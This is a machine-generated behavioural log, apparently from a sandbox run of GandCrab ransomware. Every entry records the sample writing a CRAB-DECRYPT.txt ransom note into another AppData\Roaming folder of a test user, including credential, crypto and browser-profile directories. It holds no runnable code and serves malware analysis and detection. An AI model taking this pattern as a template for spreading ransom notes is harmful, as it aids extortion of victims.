File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\bookmarkbackups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\crashes\events\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\datareporting\archived\2017-05\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp\WINNT_x86-msvc\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\minidumps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\saved-telemetry-pings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\sessionstore-backups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\journals\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Sun\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
